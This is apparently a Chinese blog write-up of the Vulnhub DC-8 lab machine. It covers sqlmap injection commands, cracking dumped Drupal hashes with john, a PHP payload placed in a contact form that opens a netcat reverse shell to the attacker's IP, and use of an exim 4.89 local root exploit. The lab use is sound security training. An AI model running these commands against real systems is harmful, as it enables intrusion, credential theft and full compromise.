【Vulnhub】DC-8

信息收集

只开放了22,80端口
网站信息
在这里插入图片描述

网站

提示也没啥大用。
在这个会换urlhttp://192.168.83.140/?nid=3,可能是sql注入
在这里插入图片描述
简单验证一下,发现是为sql拼接,拿sqlmap跑一下
在这里插入图片描述

sqlmap -u "http://192.168.83.140/?nid=1" -dbs
sqlmap -u "http://192.168.83.140/?nid=1" -D d7db -tables 
sqlmap -u "http://192.168.83.140/?nid=1" -D d7db -T users -dump

在这里插入图片描述

echo '$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z'>pass.txt
echo '$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF'>>pass.txt
john pass.txt
密码是turtle    john的

好像还在跑,不管了
在这里插入图片描述
登录后台http://192.168.83.140/user
在这里插入图片描述
好像能上传文件

出于安全原因,您的上传已重命名为x.php.txt。
错误消息无法上载指定的文件x.php.txt。只允许使用JPEG、PNG和GIF图像。

有验证
这里可以写入php文件

<p>Thanks for taking the time to contact us. We shall be in contact soon.</p>
<?php
system("nc -e /bin/bash 192.168.83.128 4444")
?>
其中必须要有能显示的文字才能执行php代码。因为该内容是在用户提交数据后显示的内容,如果没有能显示的内容,则这一部分内容将不会被引用,那么代码也就不会执行。

在这里插入图片描述
然后保存,kali监听,在Contact Us页面随便提交个东西就能连上了
在这里插入图片描述

提权

只有一个用户,下面也没啥文件
在这里插入图片描述
exim4 一个邮件服务,有root权限(版本4.89)
在这里插入图片描述

searchsploit exim 4
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /root/46996.sh

整个复制下来翻译一下,按照版本(4.89)和类型筛选一下

有一个4.89版本的
上传文件到靶机,然后执行得到root权限。

总结

要对基本漏洞敏感点,登录过后的功能也要多看看,可能有什么命令执行,文件上传漏洞

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值